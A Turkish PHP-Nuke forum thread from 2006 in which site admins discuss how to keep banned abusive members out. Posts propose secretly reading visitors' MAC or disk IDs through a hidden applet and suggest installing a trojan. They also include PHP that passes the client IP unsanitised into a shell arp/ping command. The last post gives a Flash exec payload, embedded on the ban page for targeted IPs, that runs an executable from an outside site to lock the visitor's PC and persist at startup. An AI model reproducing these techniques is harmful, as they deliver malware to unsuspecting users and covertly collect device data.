Merhaba arkadaşlar uzun süredir phpnuke kullanırım en güvendiğim konurnma yöntemi Pretector'dür. Belki daha iyileri vardır sentinel de mutlaka iyidir ama buna alıştığım için böyle geldi böyle gidiyor.
Benim üstatlardan ricam şudur.
[+] Protector'de üyenin ismini IP arama panelinden arattık bir sürü IP ile üyenin adı ortaya çıktı üyeyi orada en son geldiği IP'den banladık. Never seçerek daima banlı kalmasını sağladık ama sanırım üye yeni üyelik alarak tekrar girebiliyor giremiyorsada bana eski üye yeni nick alıp girmeyi denedi diye bir uyarı gelmediğine göre girmektedir.
Öyle bir şey olmalı ki bu üyeye gizlice bir c o o k i e yerleştirmeli ve sitemize ait c o o k i eleri silse bile (c o o k i eleri komple boşaltmadığı sürece) yeni üyelik bile açmaya kalksa bunu sistem anlamalı ve onu içeri almamalıdır.
Kısaca istenmeyen küfürbaz üyeleri değişken IP leri olduğu için daha sağlam banlama yolu nedir bir bilgisi olan varsa y_ardım ederse çok sevinirim sanırım sıradan korunma yöntemleri ile bu mümkün değil kendimize bir script yazmalı ve o kişinin bilgisayarına işaret bırakmalıyız bu işareti phpnuke indexinden algılayıp o kişiyi hiçbir şekilde içeri almamalıdır.
Sevgilerimle.
En son djalpha tarafından 2006-06-04, 00:35:54 tarihinde değiştirildi, toplam 1 kere değiştirildi
minber çabuk cevap için teşekkür ederim şimdi araştıracağım onu bir bilen senitineldeki bu özelliğin ne olarak geçtiğini belirtirse sevinirim. Sitemede PHP-Nuke Platinum v.7.6.b.4 kurayım onda her iki sistemde mevcuttu çünkü yinede yukarıdaki fikri olgunlaştırıp kendimize özel bir şey yaparsak daha iyi olacaktır bununda tek güvenli yolu vardır arkadaşlar MAC ID yada HARDDISK ID den o kişiyi saptamaktır, bunu sorgulayacak appet i ise benim yazmam mümkün değil sadece registry de nereye bakması gerektiğini bilebilirim.
Üyenin şifresini ve e-posta adresini değiştir.. En garanti yöntem işte.
sevgili atomcuk o isimle girmez ama bildiğin gibi bir emaili alıp ona ait başka bir üyelik açmak çok kolay ayrıcada statik olmayaqn daima değişen IP lerden dolayı daha agresif bir yöntem geliştirmekten ve sıradan korunma yöntemlerinden (cookilere bakmak, IP yi banlamak, üye adını işlemez hale getirmek) daha agresif bir yöntem geliştirmekten söz ediyorum üyenin o hesaba emaili ve şifresi değiştiği için girmesini önleyemeyiz eski kullandığı email ile yine bu sefer uyeadi2 şeklinde üye olup yine giriş yaparak insanları rahatsız etmeye devam edecektir siz admin olarakda bundan haberiniz olmayacak arka planda aslında sitenizi zıvanadan ve amacından uzaklaştıracak bir sürü üyenin iyi niyetlileri sömürmesinden dolayı siz fark etmeden siteniz güme gitmeye sizin hayal ettiğiniz amacından şaşmaya başlayacaktır.
Önleyemessin ki. Nasıl önleyeceksin. İpyi banlasan bile. Proxy ile girer. Statik ipsini dinamiğe çevirtir. Yani bunun önlemi yok. İstediğin kadar uğraş. Adam gider netvafelerden girer yine rahatsız eder.
onun MAC ID sini yada HARDDISK ID sini alırsam (registry den bir kaç bilgi çekerek) aliamallah giremez yolunu arıyorum inşallah burada çözeceğiz çok kararlıyım. Biri sitenize girmek istiyorsa önüne minik bir applet çıkmalı ve buna izin vermiyorsa girememelidir buna izin verdiğinde ise size o bilgileri registryden çektirecek applet yüklenecektir kişinin haberi olmayacaktır ve nuke_users tablosuna mac ıd ile drive ID kolonlarına bu bilgiler yazılacaktır. IP değişebilirsin herşeyi değişebilirsin ama bilgisayarını formatlasanda mac ID değişemez sadece harddisk ID değişirsiniz her girdiğinizde ise PC yi formatlamayı tercih etmezsiniz.
not: Tabiiki girmek isteyen bir şeklide girecektir amaç lamerleri yani 100 tane tekrar üye olup giren agresif rahatsız edici üyeden 98 tanesini önlemektir emin olun tüm üyeler saklanamadıklarını anlayınca kuzu olacaktır.
Yapabilirsen adamın bilgisiyarına truva atını yükleteceksin. O programcık adamın bilgisiyarında istedğin sitelere girememesini sağlatacaksın ki o zaman sadece elama kendi bilgisiyarından giremessin. Bilgisiyar müh. arkadaşın falan varsa olabilir.
Humm bu etik değil benim amacım evim olan siteme istemediğim kişiyi sokmamak ve sadece registryden 1 anahtarı çağırabilip nuke_users tablosuna işlemek istiyorum. Lütfen bu projemi ve fikrimi yararlı olarak geliştirelim asla bilgisayarına zarar vermemeli sadece nasıl IP adresini yada alexa toolbar kullandığı explorer versiyonu bilgilerini çekebiliyorsak MAC ID sini de (bu public bir bilgidir gizli değildir internete başlanıyorsanız bir ağa girmişsinizdir ve bu ağda IP yada MAC ID ile gezersiniz) registrysinden yada packet bilgilerinden çekerek kişisel bilgilerine bir tane daha bilgi eklemektir.
Bu sayede bu kişi ip sini değiştirse bile eternet kartını değişmediği sürece bildiğim kadarı ile MAC ID sabit kalacaktır.
Bu konu chat gibi ilerliyorsa şimdiden özür dilerim, fikirleri bir topluma açıklamak onları kaybetmek riskini göze almaktır ama bu fikir bir çok şeyin düzelmesine hizmet edecekse seve seve başkalarının kullanıp paylaşmasını isterim.
Kayıt: Feb 09, 2005 Mesajlar: 971 Konum: Ankara/Keçiören
Tarih: 2006-06-04, 09:39:14 Mesaj konusu:
Bana göre bu biraz kısır döngü. Nereyi banlarsanız banlayın bir şekilde bir açığını bulup giriyor. Mec adresini banlamak ne kadar mantıklı bilmiyorum. Eğer adam internet kafeden giriyorsa ya da internet kafe işletiyorsa onu engelleyemezsin. Elinde onlarca makine varsa ondan kalar onda girer. Dersen ki o mec adresini ve onun ağındaki mec adresini banlasın dersen, ya aynı kafeden bir başkası da giriyorsa o kafeden ne olacak ?
djalpha güzel düşünmüşsün ancak mac ip illaki donanımsal araçlarla değişmiyor, bilgisayarı fpormatladığında veya başlat-çalıştır/regedit ile de bu numarayı değiştirebiliyosun. yine de güzel bi fikir bu adres nsaıl alınır diyorsan bunun için yazılmış fonksiyonları veya direk shell komutlarını internetten bulabilmek mümkündür. denemedim ama yazayım
kullanıcının ip sini aldıktan sonra şunu yapabilirsin
Kod:
$mac = `ping $ip && arp -a | grep $ip`
tabi ping sayısını falan da kontrol altında tutabilmen lazım, yoksa host kasılır yok yere, veya şu komutları kullanabilirsin
Kod:
function returnMacAddress() {
// This code is under the GNU Public Licence
// Written by michael_stankiewicz {don't spam} at yahoo {no spam} dot com
// Tested only on linux, please report bugs
// WARNING: the commands 'which' and 'arp' should be executable
// by the apache user; on most linux boxes the default configuration
// should work fine
// Get the arp executable path
$location = `which arp`;
// Execute the arp command and store the output in $arpTable
$arpTable = `$location`;
// Split the output so every line is an entry of the $arpSplitted array
$arpSplitted = split("\n",$arpTable);
// Get the remote ip address (the ip address of the client, the browser)
$remoteIp = $GLOBALS['REMOTE_ADDR'];
// Cicle the array to find the match with the remote ip address
foreach ($arpSplitted as $value) {
// Split every arp line, this is done in case the format of the arp
// command output is a bit different than expected
$valueSplitted = split(" ",$value);
foreach ($valueSplitted as $spLine) {
if (preg_match("/$remoteIp/",$spLine)) {
$ipFound = true;
}
// The ip address has been found, now rescan all the string
// to get the mac address
if ($ipFound) {
// Rescan all the string, in case the mac address, in the string
// returned by arp, comes before the ip address
// (you know, Murphy's laws)
reset($valueSplitted);
foreach ($valueSplitted as $spLine) {
if (preg_match("/[0-9a-f][0-9a-f][:-]".
"[0-9a-f][0-9a-f][:-]".
"[0-9a-f][0-9a-f][:-]".
"[0-9a-f][0-9a-f][:-]".
"[0-9a-f][0-9a-f][:-]".
"[0-9a-f][0-9a-f]/i",$spLine)) {
return $spLine;
}
}
}
$ipFound = false;
}
}
return false;
}
ama dediğim gibi bu numaralarda değiştirilebilir, özellikle bunu yapacağın yerdeki üyeler bilgisayar hakkında bilgiliyse hiç uğraşma derim. Ha diyosanki nolursa olsun ben bunu yapacağım, elimden geldiğince YARDIM etmeye de çalıırım.
Kayıt: Mar 18, 2005 Mesajlar: 2176 Konum: istanbul-tokat
Tarih: 2006-06-05, 13:02:35 Mesaj konusu:
mac hakkında fazla bir bilgim yok ama
küfürlerini config.php de ki censor list ten yada
php nin str_replace fonksiyonu ile küfürleri engelleyebilirsin detaylar için
www.php.net/str_replace
ip sini dei
192.168.1.35 ten girdi 38 den girdi 65 den girdi mesala
192.168.1
yaz ban paneline diğerlerinin hepsini banlasın
Daha öncede belirttiğim gibi bilgili bir crackerin saldırısını engellemekten değil siteye gelen sıradan üyelerden (kız aramak, kendini polat sanmak, kafayı takmış olmak) daima yeniden farklı email ile üyelik açmasını engellemek üzerine bir projedir. Bu proje gerçekleştiğinde bir güzel şansa daha sahip olacaksınız o da aynı üyeleri tek bir query ile ortaya çıkarabileceksiniz çünkü üye adı, email, IP değişir ama defalarca söylediğim gibi MAC ID yada Harddisc ID si değişmez. (değişirsede uğraştırır o kadar uğraşanla uğraşmayı zaten hedeflemiyoruz)
Panelimize aynı MAC ID li üyelikleri dök dediğimizde hepsi ortaya dökülecektir bunların aynı CAFE de olması yada aynı evdeki kardeşler olması hiç mühüm değildir bir çoğumuz 10.000 lerce üyeli portal yönetiyoruz bir kaç istisna için huzurun bozuk gitmesini istemeyerek istisna engellenenleri de email iletişimi ile size baş vurduklarında zaten çözümlersiniz.
Bilgim ve eğitimim script yazmak SQL e sorgular üretmek üzerine değildir sadece web portal yöneticisiyim bu açıdan deneyimli arkadaşlardan y_ardım bekliyorum fikrimi kodlayıp içine adını koyan emin olun kısa sürede kahraman bir güvenlik sağlayıcı program yapmış olacaklar, ardından bu güvenliğin nasıl aşılacağı ile ilgili bir ton yöntem çıkabilir mühim değil biz internet kurtları ile değil kolay kullanıcıyı etkili bir yöntemle dışarda bırakmaya çalışıyoruz!
Kayıt: Mar 18, 2005 Mesajlar: 2176 Konum: istanbul-tokat
Tarih: 2006-06-06, 10:40:01 Mesaj konusu:
bunun için flash mx2004 ten eski bir sürüm flash lazım ben de
flash pro 8 var
mx 2004 ten sonra güvenlik dolayısıyla kapanan
Kod:
on (release) {
fscommand("exec","saho.exe")
}
yeni bir flash dosyası açmak içine action script alanına bunu yazmak sonra swf olarak publish etmek
saho.exe ile aynı dizine swf yi koymak
sonrada mesala basit birşey phpnuke nin ban ekranına
embed src=swfyolu.swf ile swf yolunu belirtmek sonra
saho.exe içeriğini kafanıza göre ayarlayın mesala şu
www.dunyali.com/phphack.exe
bu xp de 98 de hepsinde çalışıyor swf içine bunu çağırın exec ile şahsın pc si 3-5 sn sonra kitlenir daha sonra da kendisini başlangıça kopyalamaktadır bu exe
gameturkey.com webmaster serkan arkadaşımız yazmıştı zamanında duruyor bende bu işte kullanılabilir
yada phpnuke nin ban ekranı yerine şahsın ip sini biliyor isek
mesala header.php nin en üstüne
include"ban.php"; yazalım
ban.php yi root a atalım
içeriğinede
Kod:
<?php//saho
$ip = GETENV("REMOTE_ADDR");
$yasaklilar = array("192.168.1.1","160.150.140.130" );
if ($ip == '$yasaklilar') { echo"[embed src=swfyolu.swf]"; } else {
}// bu son elsenin kapanışı header.php ninen altında ?> bundan hemen önce konmalı
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız